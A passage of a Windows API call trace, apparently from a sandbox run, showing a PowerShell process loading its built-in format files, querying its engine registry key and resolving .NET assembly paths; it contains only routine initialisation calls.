	[0276.981] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd340 | out: lpFileInformation=0xcd340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0276.981] SetErrorMode (uMode=0x1) returned 0x1
	[0276.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0276.981] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd428 | out: phkResult=0xcd428*=0x308) returned 0x0
	[0276.981] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd3ac, lpData=0x0, lpcbData=0xcd3a8*=0x0 | out: lpType=0xcd3ac*=0x1, lpData=0x0, lpcbData=0xcd3a8*=0x56) returned 0x0
	[0276.981] CoTaskMemAlloc (cb=0x5a) returned 0x1c65a0
	[0276.981] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd37c, lpData=0x1c65a0, lpcbData=0xcd378*=0x56 | out: lpType=0xcd37c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd378*=0x56) returned 0x0
	[0276.981] CoTaskMemFree (pv=0x1c65a0) 
	[0276.982] RegCloseKey (hKey=0x308) returned 0x0
	[0276.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0276.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0276.983] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xe2c3a540, Data2=0xc38, Data3=0x4ff3, Data4=([0]=0x9d, [1]=0x17, [2]=0xe, [3]=0x6f, [4]=0x8e, [5]=0xfe, [6]=0xdd, [7]=0xb8))) returned 0x0
	[0276.985] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x1a3925ef, Data2=0xaba1, Data3=0x49d1, Data4=([0]=0x98, [1]=0xe0, [2]=0xa1, [3]=0x1e, [4]=0x1f, [5]=0xb7, [6]=0xb4, [7]=0x9a))) returned 0x0
	[0276.985] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x4d3932ba, Data2=0xf396, Data3=0x4445, Data4=([0]=0x8c, [1]=0x6a, [2]=0x4c, [3]=0x67, [4]=0x10, [5]=0x78, [6]=0xbe, [7]=0xb3))) returned 0x0
	[0276.985] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x2d9a8ca, Data2=0x1055, Data3=0x4cce, Data4=([0]=0x90, [1]=0xa7, [2]=0x86, [3]=0x28, [4]=0x44, [5]=0x8d, [6]=0xe7, [7]=0x37))) returned 0x0
	[0276.985] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x2aee5dbb, Data2=0x4590, Data3=0x4ef5, Data4=([0]=0x91, [1]=0xb2, [2]=0xd4, [3]=0x46, [4]=0x77, [5]=0x9d, [6]=0xaf, [7]=0x3c))) returned 0x0
	[0276.986] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xe2f621f8, Data2=0x6cbe, Data3=0x4eb4, Data4=([0]=0x81, [1]=0x61, [2]=0x0, [3]=0x27, [4]=0x19, [5]=0xc0, [6]=0xe6, [7]=0x58))) returned 0x0
	[0276.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.986] SetErrorMode (uMode=0x1) returned 0x1
	[0276.986] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0276.987] GetFileType (hFile=0x308) returned 0x1
	[0276.987] SetErrorMode (uMode=0x1) returned 0x1
	[0276.987] GetFileType (hFile=0x308) returned 0x1
	[0276.987] ReadFile (in: hFile=0x308, lpBuffer=0x3333b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x3333b40*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0276.987] ReadFile (in: hFile=0x308, lpBuffer=0x3333b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x3333b40*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0276.988] ReadFile (in: hFile=0x308, lpBuffer=0x3333b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x3333b40*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0276.988] ReadFile (in: hFile=0x308, lpBuffer=0x3333b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x3333b40*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0276.989] ReadFile (in: hFile=0x308, lpBuffer=0x3333b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x3333b40*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0276.989] ReadFile (in: hFile=0x308, lpBuffer=0x3333b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x3333b40*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0276.989] ReadFile (in: hFile=0x308, lpBuffer=0x3333b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x3333b40*, lpNumberOfBytesRead=0xcd398*=0xaca, lpOverlapped=0x0) returned 1
	[0276.989] ReadFile (in: hFile=0x308, lpBuffer=0x3333172, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x3333172*, lpNumberOfBytesRead=0xcd398*=0x0, lpOverlapped=0x0) returned 1
	[0276.989] ReadFile (in: hFile=0x308, lpBuffer=0x3333b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x3333b40*, lpNumberOfBytesRead=0xcd398*=0x0, lpOverlapped=0x0) returned 1
	[0276.989] CloseHandle (hObject=0x308) returned 1
	[0276.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.990] SetErrorMode (uMode=0x1) returned 0x1
	[0276.990] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd340 | out: lpFileInformation=0xcd340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0276.990] SetErrorMode (uMode=0x1) returned 0x1
	[0276.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.990] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd428 | out: phkResult=0xcd428*=0x308) returned 0x0
	[0276.990] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd3ac, lpData=0x0, lpcbData=0xcd3a8*=0x0 | out: lpType=0xcd3ac*=0x1, lpData=0x0, lpcbData=0xcd3a8*=0x56) returned 0x0
	[0276.990] CoTaskMemAlloc (cb=0x5a) returned 0x1c65a0
	[0276.990] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd37c, lpData=0x1c65a0, lpcbData=0xcd378*=0x56 | out: lpType=0xcd37c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd378*=0x56) returned 0x0
	[0276.990] CoTaskMemFree (pv=0x1c65a0) 
	[0276.990] RegCloseKey (hKey=0x308) returned 0x0
	[0276.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0277.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0277.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0277.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0277.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0277.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0277.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0277.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0277.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0277.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0277.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0277.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0277.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0277.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0277.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0277.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0277.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0277.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0278.339] VirtualQuery (in: lpAddress=0xcbec0, lpBuffer=0xccd80, dwLength=0x30 | out: lpBuffer=0xccd80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.339] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xdb01545b, Data2=0x3545, Data3=0x4226, Data4=([0]=0xb5, [1]=0x44, [2]=0xb9, [3]=0xb2, [4]=0x16, [5]=0x2e, [6]=0x56, [7]=0x33))) returned 0x0
	[0278.339] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x73da93f7, Data2=0x1519, Data3=0x496f, Data4=([0]=0x92, [1]=0xb6, [2]=0x7, [3]=0xdb, [4]=0xcd, [5]=0x50, [6]=0x8d, [7]=0x3e))) returned 0x0
	[0278.340] VirtualQuery (in: lpAddress=0xcc070, lpBuffer=0xccf30, dwLength=0x30 | out: lpBuffer=0xccf30*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.340] VirtualQuery (in: lpAddress=0xcc070, lpBuffer=0xccf30, dwLength=0x30 | out: lpBuffer=0xccf30*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.340] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x850929f, Data2=0x4ad7, Data3=0x4479, Data4=([0]=0xac, [1]=0x15, [2]=0xde, [3]=0xc9, [4]=0xed, [5]=0x2, [6]=0xc2, [7]=0x40))) returned 0x0
	[0278.341] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x3c5bcf0b, Data2=0x5ab8, Data3=0x4660, Data4=([0]=0x82, [1]=0x92, [2]=0xa9, [3]=0x78, [4]=0x35, [5]=0x46, [6]=0x25, [7]=0x11))) returned 0x0
	[0278.341] VirtualQuery (in: lpAddress=0xcc2c0, lpBuffer=0xcd180, dwLength=0x30 | out: lpBuffer=0xcd180*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.341] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0xccec0, dwLength=0x30 | out: lpBuffer=0xccec0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.341] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0xccec0, dwLength=0x30 | out: lpBuffer=0xccec0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.342] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x648a8df5, Data2=0x39e4, Data3=0x4bac, Data4=([0]=0xb8, [1]=0x7, [2]=0x41, [3]=0x70, [4]=0xf2, [5]=0x3f, [6]=0x54, [7]=0xab))) returned 0x0
	[0278.342] VirtualQuery (in: lpAddress=0xcc2c0, lpBuffer=0xcd180, dwLength=0x30 | out: lpBuffer=0xcd180*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.342] VirtualQuery (in: lpAddress=0xcc0e0, lpBuffer=0xccfa0, dwLength=0x30 | out: lpBuffer=0xccfa0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.342] VirtualQuery (in: lpAddress=0xcb930, lpBuffer=0xcc7f0, dwLength=0x30 | out: lpBuffer=0xcc7f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.342] VirtualQuery (in: lpAddress=0xcb930, lpBuffer=0xcc7f0, dwLength=0x30 | out: lpBuffer=0xcc7f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.343] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x492c67a, Data2=0x7d3, Data3=0x4260, Data4=([0]=0x88, [1]=0x38, [2]=0xaa, [3]=0x9d, [4]=0xd9, [5]=0x98, [6]=0xc5, [7]=0xab))) returned 0x0
	[0278.343] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xa9572a06, Data2=0xfb8d, Data3=0x4d9b, Data4=([0]=0x81, [1]=0xd5, [2]=0x70, [3]=0x53, [4]=0x3, [5]=0xd8, [6]=0xfc, [7]=0x49))) returned 0x0
	[0278.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0278.343] SetErrorMode (uMode=0x1) returned 0x1
	[0278.343] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0278.344] GetFileType (hFile=0x308) returned 0x1
	[0278.344] SetErrorMode (uMode=0x1) returned 0x1
	[0278.344] GetFileType (hFile=0x308) returned 0x1
	[0278.344] ReadFile (in: hFile=0x308, lpBuffer=0x33e6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x33e6138*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0278.344] ReadFile (in: hFile=0x308, lpBuffer=0x33e6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x33e6138*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0278.347] ReadFile (in: hFile=0x308, lpBuffer=0x33e6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x33e6138*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0278.347] ReadFile (in: hFile=0x308, lpBuffer=0x33e6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x33e6138*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
